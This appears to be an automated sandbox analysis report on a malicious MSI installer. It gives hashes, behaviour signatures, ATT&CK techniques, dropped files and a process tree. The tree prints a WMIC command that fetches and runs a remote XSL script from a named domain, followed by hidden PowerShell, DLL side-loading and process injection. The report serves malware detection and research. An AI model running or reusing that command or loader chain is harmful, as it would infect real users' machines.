Overview

overview

10

Static

static

8

test/0b627...5b.doc

windows7-x64

10

test/0b627...5b.doc

windows10-2004-x64

10

test/0dded...66.doc

windows7-x64

10

test/0dded...66.doc

windows10-2004-x64

10

test/91B5D...9D.msi

windows7-x64

8

test/91B5D...9D.msi

windows10-2004-x64

8

test/ed01e...aa.exe

windows7-x64

10

test/ed01e...aa.exe

windows10-2004-x64

10

test/fe9d7...8f.exe

windows7-x64

10

test/fe9d7...8f.exe

windows10-2004-x64

10

test/main.exe

windows7-x64

1

test/main.exe

windows10-2004-x64

1

test/main_temp.exe

windows7-x64

1

test/main_temp.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    122s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2022 14:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

  • SSDEEP

    3072:GErW9/kks5wgz88ereWn/7w05g049at7I3DGY5AvMcB3RUN46ILJ9+ZB5yOanoC:GEqckh8er1nzTD+3DGY5Aor9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 9 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1044
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\system32\MsiExec.exe
      C:\Windows\system32\MsiExec.exe -Embedding 5E29D717A757C186E943223C1B8C03A3
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1264
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          4⤵
          • Blocklisted process makes network request
          • Drops startup file
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2008
          • C:\Users\Admin\AppData\Roaming\whYWLtQUX\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\whYWLtQUX\nvsmartmaxapp.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:748
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:1832
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 32BA71121ADFB142B6854756866ED45E
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1328
      • C:\Users\Admin\AppData\Local\Temp\lc3573.tmp
        "C:\Users\Admin\AppData\Local\Temp\lc3573.tmp"
        3⤵
        • Executes dropped EXE
        PID:1036
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {F764DD8C-E2A7-47B6-ACAB-03B111D293F0} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
    1⤵
      PID:804
      • C:\Users\Admin\AppData\Roaming\whYWLtQUX\gup.exe
        C:\Users\Admin\AppData\Roaming\whYWLtQUX\gup.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Program Files (x86)\Internet Explorer\iexplore.exe
          "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          3⤵
          • Loads dropped DLL
          PID:1772

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Admin.ps1
      Filesize

      40KB

      MD5

      9a362dd5fb8679b63ca3996098a903ff

      SHA1

      f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3

      SHA256

      30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc

      SHA512

      d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\lc3573.tmp
      Filesize

      12KB

      MD5

      55ffee241709ae96cf64cb0b9a96f0d7

      SHA1

      b191810094dd2ee6b13c0d33458fafcd459681ae

      SHA256

      64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

      SHA512

      01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\NvSmartMax
      Filesize

      5.9MB

      MD5

      78ef53b2ad57536c74bbafece93a95e6

      SHA1

      4b23eb993a5853013911a0310c1cbb834500ba94

      SHA256

      371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751

      SHA512

      182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\NvSmartMax.dll
      Filesize

      3.4MB

      MD5

      5b861438e716d7c47632c4922be36795

      SHA1

      499a5534020bd3ffa82097bf1edae7668367b6bc

      SHA256

      eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

      SHA512

      9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\gup.exe
      Filesize

      566KB

      MD5

      45c01734ed56c52797156620a5f8b414

      SHA1

      fc37ac7523cf3b4020ec46d6a47bc26957e3c054

      SHA256

      20ae23a6793e58761a28949dec7e910ce6479ab9c2b7bcbd7a1bb4df1171c503

      SHA512

      4bd34101fff667a19d4884ef7f1b952dc236918138e1571aba8d5a0d691f914260a0233d6906168ed5c70f19e15f7328b1f82eb6247a1fe71395f6d4798ccf75

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\gup.xml
      Filesize

      4KB

      MD5

      b023cc4d768b34a5401f317479740a53

      SHA1

      4ca45db707b120bca9cb6cd8404b9e6ecabdb2d2

      SHA256

      d3e6404c7286961cbab82d4c49f82bcb166db9b5a13eacaa0eeb59a0709a0c14

      SHA512

      82829b0d22cdb857cf1d299a9898d1862b61cd3c22eb05cb638391d3a54b12d5dd7a824ef838a9453e2c2b85c516eacad18b6d19221ad24f0bcedc2fff942e25

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\libcurl
      Filesize

      895KB

      MD5

      b4ad244ff08ca0a4413bead51fd9bb2c

      SHA1

      61f2e2d9237406eecbd446e782549019404ef5cd

      SHA256

      b150bc468e1df07540255450df863f5e309f7142f12edd5ed2d847ef8b05ab04

      SHA512

      f56532d9c780ce61f41f0f3030760d4add99dd2bd34bf22acab15b0c497c68cefd8734576b84ce23f8f93eb80a6162ca683c0ef237512040d2515112cd75b800

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\libcurl.dll
      Filesize

      1.1MB

      MD5

      e880c09454a68b4714c6f184f7968070

      SHA1

      4dba5fe842b01b641a7228a4c8f805e4627c0012

      SHA256

      c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

      SHA512

      712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

      Download Submit
    • C:\Users\Admin\AppData\Roaming\whYWLtQUX\nvsmartmaxapp.exe
      Filesize

      213KB

      MD5

      df3e0e32d1e1fb50cc292aebc5e5b322

      SHA1

      12c93bb262696314123562f8a4b158074c9f6b95

      SHA256

      6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

      SHA512

      71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

      Download Submit
    • C:\Windows\Installer\MSI2AE8.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • C:\Windows\Installer\MSI3036.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • C:\Windows\Installer\MSI3131.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • C:\Windows\Installer\MSI5AD1.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • \Users\Admin\AppData\Local\Temp\lc3573.tmp
      Filesize

      12KB

      MD5

      55ffee241709ae96cf64cb0b9a96f0d7

      SHA1

      b191810094dd2ee6b13c0d33458fafcd459681ae

      SHA256

      64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

      SHA512

      01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

      Download Submit
    • \Users\Admin\AppData\Roaming\whYWLtQUX\NvSmartMax.dll
      Filesize

      3.4MB

      MD5

      5b861438e716d7c47632c4922be36795

      SHA1

      499a5534020bd3ffa82097bf1edae7668367b6bc

      SHA256

      eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

      SHA512

      9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

      Download Submit
    • \Users\Admin\AppData\Roaming\whYWLtQUX\NvSmartMax.dll
      Filesize

      3.4MB

      MD5

      5b861438e716d7c47632c4922be36795

      SHA1

      499a5534020bd3ffa82097bf1edae7668367b6bc

      SHA256

      eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

      SHA512

      9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

      Download Submit
    • \Users\Admin\AppData\Roaming\whYWLtQUX\libcurl.dll
      Filesize

      1.1MB

      MD5

      e880c09454a68b4714c6f184f7968070

      SHA1

      4dba5fe842b01b641a7228a4c8f805e4627c0012

      SHA256

      c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

      SHA512

      712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

      Download Submit
    • \Users\Admin\AppData\Roaming\whYWLtQUX\libcurl.dll
      Filesize

      1.1MB

      MD5

      e880c09454a68b4714c6f184f7968070

      SHA1

      4dba5fe842b01b641a7228a4c8f805e4627c0012

      SHA256

      c9cf8e159809cfa97971a0b84801c6aead32e03a423a2fd0ca1c402032b16a82

      SHA512

      712d14d1a90c1187724139d8e7c78726e41a677fa7a41a9206a95234d099b0962da757beecd61c6ba84ef9b6aa2260d3d5a40f11f282bd8a0c1cec40029daef5

      Download Submit
    • \Windows\Installer\MSI2AE8.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • \Windows\Installer\MSI3036.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • \Windows\Installer\MSI3131.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • \Windows\Installer\MSI5AD1.tmp
      Filesize

      91KB

      MD5

      9f1e5d66c2889018daef4aef604eebc4

      SHA1

      b80294261c8a1635e16e14f55a3d76889ff2c857

      SHA256

      02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

      SHA512

      8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

      Download Submit
    • memory/748-84-0x0000000000000000-mapping.dmp
      Download
    • memory/748-89-0x0000000000660000-0x00000000009DD000-memory.dmp
      Filesize

      3.5MB

      Download
    • memory/1036-74-0x0000000000000000-mapping.dmp
      Download
    • memory/1044-54-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1100-59-0x0000000000000000-mapping.dmp
      Download
    • memory/1264-58-0x0000000000150000-0x0000000000160000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1264-56-0x0000000000000000-mapping.dmp
      Download
    • memory/1328-61-0x0000000075501000-0x0000000075503000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1328-60-0x0000000000000000-mapping.dmp
      Download
    • memory/1744-100-0x0000000000600000-0x0000000000723000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/1832-92-0x0000000000000000-mapping.dmp
      Download
    • memory/1832-94-0x0000000002070000-0x00000000023ED000-memory.dmp
      Filesize

      3.5MB

      Download
    • memory/2008-90-0x000000000279B000-0x00000000027BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2008-88-0x0000000002794000-0x0000000002797000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2008-83-0x000000001B9E0000-0x000000001B9F9000-memory.dmp
      Filesize

      100KB

      Download
    • memory/2008-82-0x000000000279B000-0x00000000027BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2008-81-0x0000000002794000-0x0000000002797000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2008-77-0x000000000279B000-0x00000000027BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2008-71-0x000007FEF3590000-0x000007FEF40ED000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/2008-76-0x0000000002794000-0x0000000002797000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2008-70-0x000007FEF40F0000-0x000007FEF4B13000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/2008-67-0x0000000000000000-mapping.dmp
      Download